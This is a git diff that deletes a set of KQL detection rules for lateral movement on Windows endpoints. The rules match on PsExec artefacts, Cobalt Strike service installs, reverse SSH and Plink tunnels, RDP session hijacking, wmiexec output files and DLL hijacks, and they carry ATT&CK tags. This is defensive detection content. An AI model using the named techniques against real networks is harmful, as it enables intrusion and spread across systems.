diff --git a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
deleted file mode 100644
index 09b3d975..00000000
--- a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql b/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql
deleted file mode 100644
index 9edcca22..00000000
--- a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql b/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql
deleted file mode 100644
index 986261d9..00000000
--- a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/12
-// Level: medium
-// Description: Detects port forwarding activity via SSH.exe
-// Tags: attack.command_and_control, attack.lateral_movement, attack.t1572, attack.t1021.001, attack.t1021.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql
deleted file mode 100644
index ce7ee51b..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql
deleted file mode 100644
index 0f172583..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceImageLoadEvents
-| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql b/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql
deleted file mode 100644
index 5103ee52..00000000
--- a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Aaron Stratton
-// Date: 2023/11/13
-// Level: high
-// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
-
-// Tags: attack.t1021.003, attack.lateral_movement
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql b/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql
deleted file mode 100644
index b4c31b54..00000000
--- a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/24
-// Level: high
-// Description: Detects RDP session hijacking by using MSTSC shadowing
-// Tags: attack.lateral_movement, attack.t1563.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql b/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql
deleted file mode 100644
index dd48e1e7..00000000
--- a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
deleted file mode 100644
index 6cbd83b0..00000000
--- a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql b/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql
deleted file mode 100644
index a8265a7e..00000000
--- a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql b/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql
deleted file mode 100644
index 9f1c5485..00000000
--- a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Samir Bousseaden
-// Date: 2019/02/16
-// Level: high
-// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql b/Lateral Movement/Rundll32_Execution_Without_Parameters.kql
deleted file mode 100644
index 6fb33be4..00000000
--- a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz, Relativity
-// Date: 2021/01/31
-// Level: high
-// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql b/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql
deleted file mode 100644
index 05e8ca0b..00000000
--- a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/19
-// Level: high
-// Description: Detects suspicious Plink tunnel port forwarding to a local port
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql b/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql
deleted file mode 100644
index 781539c1..00000000
--- a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/17
-// Level: high
-// Description: Detects a suspicious RDP session redirect using tscon.exe
-// Tags: attack.lateral_movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
-DeviceProcessEvents
-| where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_SysAidServer_Child.kql b/Lateral Movement/Suspicious_SysAidServer_Child.kql
deleted file mode 100644
index e0e0d33e..00000000
--- a/Lateral Movement/Suspicious_SysAidServer_Child.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
-// Tags: attack.lateral_movement, attack.t1210
-DeviceProcessEvents
-| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_UltraVNC_Execution.kql b/Lateral Movement/Suspicious_UltraVNC_Execution.kql
deleted file mode 100644
index e5a222c2..00000000
--- a/Lateral Movement/Suspicious_UltraVNC_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/03/04
-// Level: high
-// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
-// Tags: attack.lateral_movement, attack.g0047, attack.t1021.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql b/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Lateral Movement/Terminal_Service_Process_Spawn.kql b/Lateral Movement/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Lateral Movement/Terminal_Service_Process_Spawn.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql b/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql b/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index 38313837..00000000
--- a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects when an admin share is mounted using net.exe
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index d5e9627d..00000000
--- a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/21
-// Level: high
-// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index a8ed798d..00000000
--- a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/02
-// Level: low
-// Description: Detects when a share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Wmiexec_Default_Output_File.kql b/Lateral Movement/Wmiexec_Default_Output_File.kql
deleted file mode 100644
index e9f42bee..00000000
--- a/Lateral Movement/Wmiexec_Default_Output_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: critical
-// Description: Detects the creation of the default output filename used by the wmiexec tool
-// Tags: attack.lateral_movement, attack.t1047
-DeviceFileEvents
-| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql
deleted file mode 100644
index 631d57e9..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
deleted file mode 100644
index 60ed5e82..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Writing_Local_Admin_Share.kql b/Lateral Movement/Writing_Local_Admin_Share.kql
deleted file mode 100644
index 0c4f5452..00000000
--- a/Lateral Movement/Writing_Local_Admin_Share.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
-This technique is used by post-exploitation frameworks.
-
-// Tags: attack.lateral_movement, attack.t1546.002
-DeviceFileEvents
-| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
